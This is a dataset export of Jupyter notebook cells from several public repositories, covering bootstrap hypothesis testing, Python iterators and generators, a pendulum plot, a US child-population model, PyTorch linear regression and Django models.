markdown
stringlengths
0
1.02M
code
stringlengths
0
832k
output
stringlengths
0
1.02M
license
stringlengths
3
36
path
stringlengths
6
265
repo_name
stringlengths
6
127
Simulating From the Null HypothesisLoad in the data below, and follow the questions to assist with answering the quiz questions below.
import pandas as pd import numpy as np import matplotlib.pyplot as plt %matplotlib inline np.random.seed(42) full_data = pd.read_csv('../data/coffee_dataset.csv') sample_data = full_data.sample(200)
_____no_output_____
MIT
hypothesis_testing/10_HypothesisTesting/13_Simulating From the Null Hypothesis.ipynb
Zabamund/datasci-nano
`1.` If you were interested in if the average height for coffee drinkers is the same as for non-coffee drinkers, what would the null and alternative be? Place them in the cell below, and use your answer to answer the first quiz question below. **Since there is no directional component associated with this statement, a not equal to seems most reasonable.**$$H_0: \mu_{coff} - \mu_{no} = 0$$$$H_0: \mu_{coff} - \mu_{no} \neq 0$$**$\mu_{coff}$ and $\mu_{no}$ are the population mean values for coffee drinkers and non-coffee drinkers, respectivley.** `2.` If you were interested in if the average height for coffee drinkers is less than non-coffee drinkers, what would the null and alternative be? Place them in the cell below, and use your answer to answer the second quiz question below. **In this case, there is a question associated with a direction - that is the average height for coffee drinkers is less than non-coffee drinkers. Below is one of the ways you could write the null and alternative. Since the mean for coffee drinkers is listed first here, the alternative would suggest that this is negative.**$$H_0: \mu_{coff} - \mu_{no} \geq 0$$$$H_0: \mu_{coff} - \mu_{no} < 0$$**$\mu_{coff}$ and $\mu_{no}$ are the population mean values for coffee drinkers and non-coffee drinkers, respectivley.** `3.` For 10,000 iterations: bootstrap the sample data, calculate the mean height for coffee drinkers and non-coffee drinkers, and calculate the difference in means for each sample. You will want to have three arrays at the end of the iterations - one for each mean and one for the difference in means. Use the results of your sampling distribution, to answer the third quiz question below.
nocoff_means, coff_means, diffs = [], [], [] for _ in range(10000): bootsamp = sample_data.sample(200, replace = True) coff_mean = bootsamp[bootsamp['drinks_coffee'] == True]['height'].mean() nocoff_mean = bootsamp[bootsamp['drinks_coffee'] == False]['height'].mean() # append the info coff_means.append(coff_mean) nocoff_means.append(nocoff_mean) diffs.append(coff_mean - nocoff_mean) np.std(nocoff_means) # the standard deviation of the sampling distribution for nocoff np.std(coff_means) # the standard deviation of the sampling distribution for coff np.std(diffs) # the standard deviation for the sampling distribution for difference in means plt.hist(nocoff_means, alpha = 0.5); plt.hist(coff_means, alpha = 0.5); # They look pretty normal to me! plt.hist(diffs, alpha = 0.5); # again normal - this is by the central limit theorem
_____no_output_____
MIT
hypothesis_testing/10_HypothesisTesting/13_Simulating From the Null Hypothesis.ipynb
Zabamund/datasci-nano
`4.` Now, use your sampling distribution for the difference in means and [the docs](https://docs.scipy.org/doc/numpy-1.13.0/reference/generated/numpy.random.normal.html) to simulate what you would expect if your sampling distribution were centered on zero. Also, calculate the observed sample mean difference in `sample_data`. Use your solutions to answer the last questions in the quiz below. ** We would expect the sampling distribution to be normal by the Central Limit Theorem, and we know the standard deviation of the sampling distribution of the difference in means from the previous question, so we can use this to simulate draws from the sampling distribution under the null hypothesis. If there is truly no difference, then the difference between the means should be zero.**
null_vals = np.random.normal(0, np.std(diffs), 10000) # Here are 10000 draws from the sampling distribution under the null plt.hist(null_vals); #Here is the sampling distribution of the difference under the null
_____no_output_____
MIT
hypothesis_testing/10_HypothesisTesting/13_Simulating From the Null Hypothesis.ipynb
Zabamund/datasci-nano
Iterators, Generators, and Uncertainty Suppose you are working on a Python API that provides access to a real-time data stream (perhaps from an array of sensors or from a web service that handles user requests). You would like to deliver to the consumers of your API a simple but flexible abstraction that allows them to operate on new items from the stream when they choose to do so. Furthermore, you would like the API to allow users to do the following three things:* specify fall-back or default data streams (*e.g.*, if their first choice of stream is exhausted);* interleave items coming from multiple streams (presenting them as a single, new stream); and* process the items from a stream in parallel using multiprocessing.What abstraction should you use? How much of it must be custom-built and how much can be done using native Python features? When working with data streams, state spaces, and other abstractions that represent large or unbounded structures, it can be tempting to custom-build solutions that may become increasingly complex and difficult to maintain. Understanding a range of features that are already available in a language or its built-in libraries can help mitigate this while saving significant time and effort (both your own and that of others who build upon your work). Iterators and generators are powerful tools in the Python language that have compelling applications in a number of contexts. This article reviews how they are defined, how they can be used, how they are related to one another, and how they can help you work in an elegant and flexible way with data structures and data streams of an unknown or infinite size. Iterables, Iterators, and Generators When discussing Python, the terms *iterable*, *iterator*, and *generator* often appear in similar contexts or are even used interchangeably. These language features also solve similar problems. This can lead to some confusion, but there is a reason that on occasion these are conflated. One way to understand the term *iterator* is that it refers to *any* Python data structure that *has an interface* that supports iteration over objects one at a time. A data structure is *iterable* if there is *at least one way* to construct an iterator that traverses it in some way. On the other hand, a *generator* is a particular kind of data structure, defined in a specific way within Python, that maintains an internal state and constructs or retrieves zero or more objects or values one at a time. Thus, a generator by virtue of its characteristics can have an interface that allows it to qualify as an iterator, which consequently also makes it an iterable. In fact, all generators are iterators and iterable. However, not all iterators or iterable data structures are generators because there exist other approaches for building a Python object that possesses the kind of interface an iterator or iterable is expected to have. Iterators If you want to implement an iterator data structure directly, you need to include a special method `__next__` in the class definition, which will be invoked whenever the built-in [`next`](https://docs.python.org/3/library/functions.htmlnext) function is applied to an instance of that data structure. The `skips` data structure below can emit every other positive integer via its definition of a `__next__` method.
class skips: def __init__(self): self.integer = 0 def __next__(self): self.integer += 2 return self.integer
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Now it is possible to use the built-in [`next`](https://docs.python.org/3/library/functions.htmlnext) function to retrieve each item one at a time from an instance of the `skips` data structure.
ns = skips() [next(ns), next(ns), next(ns)]
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
The number of items over which the data structure will iterate can be limited by raising the `StopIteration` exception when more items can not (or should not) be returned.
class skips: def __init__(self, start, end): self.integer = start-2 self.end = end def __next__(self): self.integer += 2 if self.integer > self.end: raise StopIteration return self.integer
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
It is then the responsibility of any code that uses an instance of this iterator to catch this exception and handle it appropriately. It is worth acknowledging that this is a somewhat unusual use of a language feature normally associated with catching errors (because an iterator being exhausted is not always an error condition).
ns = skips(0, 10) while True: try: print(next(ns)) except StopIteration: break
0 2 4 6 8 10
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Iterables In Python, there is a distinction between an *iterator* and an *iterable data structure*. This distinction is useful to maintain for a variety of reasons, including the ones below.* You may not want to clutter a data structure (as it may represent a spreadsheet, a database table, a large graph, and so on) with the state necessary to keep track of an iteration process.* You may want the data structure to support *multiple* iterators, either semantically (*e.g.*, iteration over rows versus over columns) or in terms of implementation (*e.g.*, breadth-first search versus depth-first search).* You may want to make it easy to *reset* iteration without fiddling with the internal state of a data structure instance (*i.e.*, resetting a traversal of the data structure instance could involve simply creating a fresh iterator). As an example, consider a data structure `interval` that represents all positive integers in some range. Users might be allowed to obtain two different kinds of iterators for an instance of this data structure: those that iterate over only the even integers and those that iterate over only the odd integers.
class interval: def __init__(self, lower, upper): self.lower = lower self.upper = upper def evens(self): return skips( self.lower + (0 if (self.lower % 2) == 0 else 1), self.upper ) def odds(self): return skips( self.lower + (0 if (self.lower % 2) == 1 else 1), self.upper )
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
The example below illustrates how an iterator returned by one of the methods in the definition of `interval` can be used.
ns = interval(0, 10).odds() while True: # Keep iterating and printing until exhaustion. try: print(next(ns)) except StopIteration: break
1 3 5 7 9
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
So far in this article, the distinction between *iterators* and *iterable data structures* has been explicit for clarity. However, the convention that is supported (and sometimes expected) throughout Python is that an iterable data structure has a *single* iterator that can be used to iterate over it. This iterator is returned by a special method [`__iter__`](https://docs.python.org/3/reference/datamodel.htmlobject.__iter__) that is included in the class definition. In the example below, the `interval` class supports the creation of an iterator that visits every integer in the interval.
class every: def __init__(self, start, end): self.integer = start - 1 self.end = end def __next__(self): self.integer += 1 if self.integer > self.end: raise StopIteration return self.integer class interval: def __init__(self, lower, upper): self.lower = lower self.upper = upper def __iter__(self): return every(self.lower, self.upper)
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Python's built-in [`iter`](https://docs.python.org/3/library/functions.htmliter) function can be used to invoke `__iter__` for an instance of this data structure.
ns = iter(interval(1, 3)) while True: # Keep iterating and printing until exhaustion. try: print(next(ns)) except StopIteration: break
1 2 3
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Including a definition for an `__iter__` method also makes it possible to use many of Python's built-in functions and language constructs that expect an iterable data structure. This includes functions such as [`list`](https://docs.python.org/3/library/functions.htmlfunc-list) and [`set`](https://docs.python.org/3/library/functions.htmlfunc-set), which use `iter` to obtain an iterator for their inputs.
list(interval(0, 10)), set(interval(0, 10))
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
This also includes comprehensions and `for` loops.
for n in interval(1, 4): print([k for k in interval(1, n)])
[1] [1, 2] [1, 2, 3] [1, 2, 3, 4]
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
There is nothing stopping you from making the iterator itself an iterable by having it return itself, as in the variant below.
class every: def __init__(self, start, end): self.integer = start - 1 self.end = end def __next__(self): self.integer += 1 if self.integer > self.end: raise StopIteration return self.integer def __iter__(self): return self
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
This approach ensures that there is no ambiguity (from a programmer's perspective) about what will happen when built-in functions such as `list` are applied to an instance of the data structure.
list(every(0, 10))
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
This practice is common and is the cause of some of the confusion and conflation that occurs between iterators and iterables. In addition to the potential for confusion, users of such a data structure must be careful to use the iterator as an iterable only once (or, alternatively, the object must reset its internal state every time `__iter__` is invoked).
ns = every(0, 10) list(ns), list(ns) # Only returns contents the first time.
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Nevertheless, this can also be a useful practice. Going back to the example with `evens` and `odds`, ensuring the iterators returned by these methods are also iterable means they can be fed directly into contexts that expect an iterable.
class skips: def __init__(self, start, end): self.integer = start - 2 self.end = end def __next__(self): self.integer += 2 if self.integer > self.end: raise StopIteration return self.integer def __iter__(self): return self class interval: def __init__(self, lower, upper): self.lower = lower self.upper = upper def evens(self): return skips( self.lower + (0 if (self.lower % 2) == 0 else 1), self.upper ) def odds(self): return skips( self.lower + (0 if (self.lower % 2) == 1 else 1), self.upper )
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
The example below illustrates how this kind of interface can be used.
i = interval(0, 10) list(i.evens()), set(i.odds())
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Generators Generators are data structures defined using either the `yield` statement or comprehension notation (also known as a [generator expression](https://docs.python.org/3/glossary.htmlterm-generator-expression)). The example below defines a generator `skips` using both approaches.
def skips(start, end): integer = start while integer <= end: yield integer integer += 2 def skips(start, end): return ( integer for integer in range(start, end) if (integer - start) % 2 == 0 )
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
When it is evaluated, a generator returns an iterator (more precisely called a [generator iterator](https://docs.python.org/3/glossary.htmlterm-generator-iterator)). These are technically both iterators and iterables. For example, as with any iterator, `next` can be applied directly to instances of this data structure.
ns = skips(0, 10) next(ns), next(ns), next(ns)
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
As with any iterator, exhaustion can be detected by catching the `StopIteration` exception.
ns = skips(0, 2) try: next(ns), next(ns), next(ns) except StopIteration: print("Exhausted generator iterator.")
Exhausted generator iterator.
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Finally, an instance of the data structure can be used in any context that expects an iterable.
list(skips(0, 10))
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
It is possible to confirm that the result of evaluating `skips` is indeed a generator by checking its type.
import types isinstance(skips(0, 10), types.GeneratorType)
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
It is also possible to inspect its type to confirm that `skips` indeed evaluates to an iterator.
import collections isinstance(skips(0, 10), collections.abc.Iterator)
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Data Structures of Infinite or Unknown Size Among the use cases that demonstrate how iterators/generators serve as a powerful language feature are scenarios involving data structures whose size is unknown or unbounded/infinite (such as streams, very large files, databases, and so on). You have already seen that you can define an iterable that can produce new objects or values indefinitely, so iterables are an effective way to represent and encapsulate such structures. Returning to the example described at the beginning of the article, recall that you are faced with creating a Python API for working with data streams that might (or might not) run out of items that can be drawn from them. The advantages of leveraging iterables and generators should be evident at this point, so suppose you move ahead with this option and implement an iterable to represent a data stream. How can you address the three specific requirements (*i.e.*, default/fall-back streams, interleaving, and splitting for parallelism) using these features? To satisfy the first requirement, you must allow a user to exhaust one iterable and then switch to another one. This is straightforward to do by constructing a generator that concatenates two iterables.
def concatenate(xs, ys): for x in xs: yield x for y in ys: yield y
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Concatenating two instances of an iterable data structure is now straightforward.
list(concatenate(skips(0,5), skips(6,11)))
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Notice that if the first iterable is never exhausted, the second one will never be used. To address the second requirement, first consider a simpler scenario. What if you would like to "line up" or "pair up" entries in two or more iterables? You can use the built-in [`zip`](https://docs.python.org/3/library/functions.htmlzip) function.
list(zip(skips(0,5), skips(6,11)))
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Notice that the result of evaluating `zip` is indeed an iterator.
import collections isinstance( zip(skips(0,5), skips(6,11)), collections.abc.Iterator )
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Combining `zip` with comprehension syntax, you can now define a generator that *interleaves* two iterables (switching back and forth between emitting an item from one and then the other).
def interleave(xs, ys): return ( z for (x, y) in zip(xs, ys) for z in (x, y) )
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
As with concatenation, interleaving is now concise and straightforward.
list(interleave(skips(0,5), skips(6,11)))
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Finally, how can you help users process items from a stream in parallel? Because you are already using iterables, users have some options available to them from the built-in [`itertools`](https://docs.python.org/3/library/itertools.html) library. One option is [`islice`](https://docs.python.org/3/library/itertools.htmlitertools.islice), which behaves in a similar manner to Python [slice notation](https://docs.python.org/3/library/functions.html?highlight=sliceslice) (such as `xs[0:10]` to extract the first ten entries from a list `xs`). Users can use this function to extract items in batches and (1) pass each item in a batch to its own separate thread or (2) pass batches of items to separate threads. A basic batching method is presented below.
from itertools import islice def batch(xs, size): ys = list(islice(xs, 0, size)) while len(ys) > 0: yield ys ys = list(islice(xs, 0, size))
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Notice that this method inherits the graceful behavior of slice notation when the boundaries of the slices do not line up exactly with the number entries in the data structure instance.
list(batch(skips(0,21), 3))
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
Can you define a generator that returns batches of batches (*e.g.*, at most `n` batches each of size at most `k`)? Another option is to use the [`tee`](https://docs.python.org/3/library/itertools.htmlitertools.tee) function, which can duplicate a single iterable into multiple iterables. However, this function is really only simulating this effect by storing a large amount of auxiliary information from one of the iterables. Thus, it may use a significant amount of memory and is not safe to use with multiprocessing. It is best suited for situations in which the iterables are known to have a small number of items, as in the example below.
from itertools import tee (a, b) = tee(skips(0,11), 2) (list(a), list(b))
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
The example above is arguably implemented in a more clear and familiar way by simply wrapping the iterables using `list`.
ns = list(skips(0,11)) (ns, ns)
_____no_output_____
MIT
iterators-generators-and-uncertainty.ipynb
python-supply/iterators-generators-and-uncertainty
TAREA GRAVEDAD
%matplotlib inline import matplotlib.pyplot as plt import numpy as np m = 1 x_0 = .5 x_0_dot = .1 t = np.linspace(0, 50, 300) gravedad=np.array([9.81,2.78,8.87,3.72,22.88]) gravedad plt.figure(figsize = (7, 4)) for indx, g in enumerate (gravedad): omega_0 = np.sqrt(g/m) x_t = x_0 *np.cos(omega_0 *t) + (x_0_dot/omega_0) * np.sin(omega_0 *t) x_t_dot = -omega_0 * x_0 * np.sin(omega_0 * t) + x_0_dot * np.cos(omega_0 * t) plt.plot(x_t, x_t_dot/omega_0, 'ro', ms = 2) plt.legend(loc='best', bbox_to_anchor=(1.01, 0.5), prop={'size': 14}) plt.scatter (x_t , (x_t_dot/omega_0), cmap = "viridis", label = g) plt.show()
C:\Users\MaríaEsther\Anaconda3\lib\site-packages\matplotlib\axes\_axes.py:545: UserWarning: No labelled objects found. Use label='...' kwarg on individual plots. warnings.warn("No labelled objects found. "
MIT
Gravedad.ipynb
Urakami97/Gravedad-Tarea-
Modeling and Simulation in Python-Project 1Dhara Patel and Corinne Wilklow Copyright 2018 Allen DowneyLicense: [Creative Commons Attribution 4.0 International](https://creativecommons.org/licenses/by/4.0)
# Configure Jupyter so figures appear in the notebook %matplotlib inline # Configure Jupyter to display the assigned value after an assignment %config InteractiveShell.ast_node_interactivity='last_expr_or_assign' # import functions from the modsim library from modsim import * from pandas import read_html print('done') # Importing Population Data filename = 'data/US_Population_data.html' tables = read_html(filename, header=0, index_col=0, decimal='M') table = tables[3] table1 = table[1910.0:2010.0] table1.columns = ['population'] print(table1)
population Censusyear 1910.0 92228496.0 1920.0 106021537.0 1930.0 123202624.0 1940.0 132164569.0 1950.0 151325798.0 1960.0 179323175.0 1970.0 203211926.0 1980.0 226545805.0 1990.0 248709873.0 2000.0 281421906.0 2010.0 308745538.0
MIT
code/Project_1_US_Children_9-30_final2.ipynb
cwilklow/ModSimPy
The state: initial child population, initial United States populationThe system: birth rates, child mortality rates, mature rates(birth rates 18 years prior)Metrics: annual child population
def plot_results(population, childseries, title): """Plot the estimates and the model. population: TimeSeries of historical population data childseries: TimeSeries of child population estimates title: string """ plot(population, ':', label='US Population') if len(childseries): plot(childseries, color='gray', label='US Children') # plot(ratioseries, label='Ratio of children') decorate(xlabel='Year', ylabel='Population (million)', title=title) def plot_ratio(ratioseries, title): """Plot the estimates and the model. population: TimeSeries of historical population data childseries: TimeSeries of child population estimates title: string """ if len(ratioseries): plot(ratioseries, color='gray', label='Ratio of Children') # plot(ratioseries, label='Ratio of children') decorate(xlabel='Year', ylabel='Population (million)', title=title) population = table1.population / 1e6 childseries = TimeSeries() ratioseries = TimeSeries() plot_results(population, childseries, 'U.S. population')
_____no_output_____
MIT
code/Project_1_US_Children_9-30_final2.ipynb
cwilklow/ModSimPy
Why is the proportion of children in the United States decreasing? Over the past two decades, the United States population grew by about 20%. During the same time frame, the nation’s child population grew by only 5%. The population all around the world is aging, and children represent a smaller and smaller share of it. There are other countries in which this decrease is more dramatic, such as Germany or Japan which no longer have a positive natural increase in population. A decreasing proportion of children is a problem because the issue will only compound over time, until the population as a whole begins to decline. The decreasing ratio of children could be due to several factors: declining fertility rates, an aging population, and a drop in net immigration levels. Our model focuses on the effects of fertility rates and child mortality rates on proportions of children in the US. Specifically, if we sweep birthrates and child mortality rates, what effects does that have on the population as a whole? Could changing birth rates and death rates account for the entirety of the changing demographics? We will use US Census data from 1910-2010 to compare to our results.
#sweeping both the mortality rate and the birth rate will make the model more accurate birthrate = [29.06, 25.03, 19.22, 22.63, 24.86, 20.33, 15.57, 15.83, 15.08, 13.97] deathrate = linspace(0.0065, 0.0031, 10) maturerate = [31.5, 29.06, 25.03, 19.22, 22.63, 24.86, 20.33, 15.57, 15.83, 15.08] print(birthrate) print(deathrate) print(maturerate) state = State(children = 47.3, t_pop= 151325798.0/1e6, ratio = 47.3/151325798.0/1e6)
_____no_output_____
MIT
code/Project_1_US_Children_9-30_final2.ipynb
cwilklow/ModSimPy
Parameters:
system = System(birthrate = birthrate, maturerate = maturerate, deathrate = deathrate, t_0 = 1910.0, t_end = 2010.0, state=state)
_____no_output_____
MIT
code/Project_1_US_Children_9-30_final2.ipynb
cwilklow/ModSimPy
Our update function computes the updated state of these parameters at the end of each ten year increment.
def update_func1(state, t, system): t_pop=151325798.0 if t == 1910: i = int((t-1910)/10) else: i = int((t-1910)/10 - 1) mrate = system.maturerate brate = system.birthrate drate = system.deathrate births = brate[i]/100 * state.children #metric maturings = mrate[i]/100 * state.children #metric deaths = drate[i]/100 * state.children #metric population = state.children + births - maturings - deaths #print('children',children) return State(children=population)
_____no_output_____
MIT
code/Project_1_US_Children_9-30_final2.ipynb
cwilklow/ModSimPy
To test our update function, we'll input the initial condition:
update_func1(state,system.t_0,system) def run_simulation(state, system, update_func): """Simulate the system using any update function. state: initial State object system: System object update_func: function that computes the population next year returns: TimeSeries of Ratios """ #t_pop=151325798.0 results = TimeSeries() state = system.state results[system.t_0] = state.children for t in linrange(1910.0, 2020.0): if t%10 == 0: '''if t == 1910: i = int((t-1910)/10) else: i = int((t-1910)/10 - 1)''' state.children = update_func1(state, t, system) results[t] = state.children return results print(population[1910]) '''def update_ratio(state, t, system): childpop = state.children popu = population[t] ratio = childpop/popu return State(ratio = ratio) def run_ratio(state, system, update_ratio): results = TimeSeries() results[system.t_0] = state.ratio for t in linrange(1910.0, 2020.0): if t%10 == 0: results[t] = update_ratio(state, t, system)''' childseries = run_simulation(state, system, update_func1) for t in linrange(1910.0, 2020.0): if t%10 == 0: ratioseries[t] = childseries[t]/population[t] print(ratioseries) empty = TimeSeries() fig1 = plot_results(population, childseries, 'Population of children in U.S.') fig2 = plot_ratio(ratioseries, 'Ratio of children in the U.S.')
_____no_output_____
MIT
code/Project_1_US_Children_9-30_final2.ipynb
cwilklow/ModSimPy
Jupyter (iPython) Notebookを使って技術ノート環境を構築する方法myenigma.hatenablog.com
from sympy import * x=Symbol('x') %matplotlib inline init_printing() expand((x - 3)**5)
_____no_output_____
MIT
.ipynb_checkpoints/learnJupyter-checkpoint.ipynb
kalz2q/files
Linear Regression Multiple Outputs Table of ContentsIn this lab, you will create a model the PyTroch way. This will help you more complicated models. Make Some Data Create the Model and Cost Function the PyTorch way Train the Model: Batch Gradient DescentEstimated Time Needed: 20 min Preparation We'll need the following libraries:
# Import the libraries we need for this lab from torch import nn,optim import torch import numpy as np import matplotlib.pyplot as plt from mpl_toolkits.mplot3d import Axes3D from torch.utils.data import Dataset, DataLoader
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Set the random seed:
# Set the random seed to 1. torch.manual_seed(1)
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Use this function for plotting:
# The function for plotting 2D def Plot_2D_Plane(model, dataset, n=0): w1 = model.state_dict()['linear.weight'].numpy()[0][0] w2 = model.state_dict()['linear.weight'].numpy()[0][1] b = model.state_dict()['linear.bias'].numpy() # Data x1 = data_set.x[:, 0].view(-1, 1).numpy() x2 = data_set.x[:, 1].view(-1, 1).numpy() y = data_set.y.numpy() # Make plane X, Y = np.meshgrid(np.arange(x1.min(), x1.max(), 0.05), np.arange(x2.min(), x2.max(), 0.05)) yhat = w1 * X + w2 * Y + b # Plotting fig = plt.figure() ax = fig.gca(projection='3d') ax.plot(x1[:, 0], x2[:, 0], y[:, 0],'ro', label='y') # Scatter plot ax.plot_surface(X, Y, yhat) # Plane plot ax.set_xlabel('x1 ') ax.set_ylabel('x2 ') ax.set_zlabel('y') plt.title('estimated plane iteration:' + str(n)) ax.legend() plt.show()
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Make Some Data Create a dataset class with two-dimensional features:
# Create a 2D dataset class Data2D(Dataset): # Constructor def __init__(self): self.x = torch.zeros(20, 2) self.x[:, 0] = torch.arange(-1, 1, 0.1) self.x[:, 1] = torch.arange(-1, 1, 0.1) self.w = torch.tensor([[1.0], [1.0]]) self.b = 1 self.f = torch.mm(self.x, self.w) + self.b self.y = self.f + 0.1 * torch.randn((self.x.shape[0],1)) self.len = self.x.shape[0] # Getter def __getitem__(self, index): return self.x[index], self.y[index] # Get Length def __len__(self): return self.len
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Create a dataset object:
# Create the dataset object data_set = Data2D()
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Create the Model, Optimizer, and Total Loss Function (Cost) Create a customized linear regression module:
# Create a customized linear class linear_regression(nn.Module): # Constructor def __init__(self, input_size, output_size): super(linear_regression, self).__init__() self.linear = nn.Linear(input_size, output_size) # Prediction def forward(self, x): yhat = self.linear(x) return yhat
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Create a model. Use two features: make the input size 2 and the output size 1:
# Create the linear regression model and print the parameters model = linear_regression(2,1) print("The parameters: ", list(model.parameters()))
The parameters: [Parameter containing: tensor([[ 0.6209, -0.1178]], requires_grad=True), Parameter containing: tensor([0.3026], requires_grad=True)]
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Create an optimizer object. Set the learning rate to 0.1. Don't forget to enter the model parameters in the constructor.
# Create the optimizer optimizer = optim.SGD(model.parameters(), lr=0.1)
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Create the criterion function that calculates the total loss or cost:
# Create the cost function criterion = nn.MSELoss()
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Create a data loader object. Set the batch_size equal to 2:
# Create the data loader train_loader = DataLoader(dataset=data_set, batch_size=2)
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Train the Model via Mini-Batch Gradient Descent Run 100 epochs of Mini-Batch Gradient Descent and store the total loss or cost for every iteration. Remember that this is an approximation of the true total loss or cost:
# Train the model LOSS = [] print("Before Training: ") Plot_2D_Plane(model, data_set) epochs = 100 def train_model(epochs): for epoch in range(epochs): for x,y in train_loader: yhat = model(x) loss = criterion(yhat, y) LOSS.append(loss.item()) optimizer.zero_grad() loss.backward() optimizer.step() train_model(epochs) print("After Training: ") Plot_2D_Plane(model, data_set, epochs) # Plot out the Loss and iteration diagram plt.plot(LOSS) plt.xlabel("Iterations ") plt.ylabel("Cost/total loss ")
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Practice Create a new model1. Train the model with a batch size 30 and learning rate 0.1, store the loss or total cost in a list LOSS1, and plot the results.
# Practice create model1. Train the model with batch size 30 and learning rate 0.1, store the loss in a list <code>LOSS1</code>. Plot the results. data_set = Data2D()
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Double-click here for the solution.<!-- Your answer is below:train_loader = DataLoader(dataset = data_set, batch_size = 30)model1 = linear_regression(2, 1)optimizer = optim.SGD(model1.parameters(), lr = 0.1)LOSS1 = []epochs = 100def train_model(epochs): for epoch in range(epochs): for x,y in train_loader: yhat = model1(x) loss = criterion(yhat,y) LOSS1.append(loss.item()) optimizer.zero_grad() loss.backward() optimizer.step() train_model(epochs)Plot_2D_Plane(model1 , data_set) plt.plot(LOSS1)plt.xlabel("iterations ")plt.ylabel("Cost/total loss ")--> Use the following validation data to calculate the total loss or cost for both models:
torch.manual_seed(2) validation_data = Data2D() Y = validation_data.y X = validation_data.x
_____no_output_____
MIT
IBM_AI/4_Pytorch/4.2.multiple_linear_regression_training_v2.ipynb
merula89/cousera_notebooks
Creating groupsWe are going to create a simple group.
group = Group.objects.create(name='My First Group') group.pk
_____no_output_____
MIT
notebooks/Django Models.ipynb
warplydesigned/django_jupyter
Now lets create a group that is a child of the first group.
group_child = Group.objects.create(name='Child of (My First Group)', parent_group=group) group_child.parent_group.name
_____no_output_____
MIT
notebooks/Django Models.ipynb
warplydesigned/django_jupyter
Creating jobsNow that we have a few groups lets create some jobs to add to the groups.
job_1 = Job.objects.create(title='Job 1') job_2 = Job.objects.create(title='Job 2')
_____no_output_____
MIT
notebooks/Django Models.ipynb
warplydesigned/django_jupyter
Adding jobs to a group
group.jobs.add(job_1) group_child.jobs.add(job_2)
_____no_output_____
MIT
notebooks/Django Models.ipynb
warplydesigned/django_jupyter
Ok now lets add some saved candidates to a new group
